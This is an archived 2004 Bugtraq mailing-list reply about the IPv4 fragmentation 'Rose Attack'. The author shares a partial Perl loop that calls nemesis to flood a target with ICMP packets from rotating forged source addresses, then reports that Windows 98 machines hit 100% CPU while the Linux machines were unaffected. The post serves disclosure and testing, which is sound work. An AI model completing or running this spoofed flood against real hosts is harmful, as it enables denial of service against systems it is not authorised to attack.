| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4073C25A.40201@atlantis.bg>
Date: Wed, 07 Apr 2004 11:56:58 +0300
From: Ventsislav Genchev <vigour@...antis.bg>
To: bugtraq@...urityfocus.com
Subject: Re: IPv4 fragmentation --> The Rose Attack
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I've just made some tests following the described example at:
http://gandalf.home.digital.net/TestProc.txt
To use different src addresses in the attack i've used the following
example:
#!/usr/bin/perl
$src=$ARGV[1];
if($src=~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/) {
$one=$1;
$two=$2;
$three=$3;
$four=$4;
}
while(1) {
system("nemesis icmp -S $one.$two.$three.$four -D $ARGV[0] ....... );
..................
..................
$four++;
if($four>=254) { $three++; $four=1; }
if($three>=254) { $two++; $three=1; }
if($two>=254) { $one++; $two=1; }
#sleep(2);
}
I've tested the attack on 4 machines..
The first two were running windows 98 SE with all patches and service
packs... the CPU stuck the 100% as soon as the attack started..
The last two machines were running Fedora Core 1 Linux and RedHat Linux
9... no success here... the attack seems not to bother the normal work
of the PCs... The RedHat Linux uses kernel-2.4.20-30.9...
- --
Ventsislav Genchev
Atlantis BG, Ltd.
E-mail: vigour@...antis.bg
tel: +35928757001
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAc8JawxiN6NaquRwRAuUFAKCNLzN5vCk8Ac4EB+khIFai1GU27ACfd7hf
mlyeGSn87eVVpeYU3J9HlSI=
=/+Bv
-----END PGP SIGNATURE-----
Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (3174 bytes)
Powered by blists - more mailing lists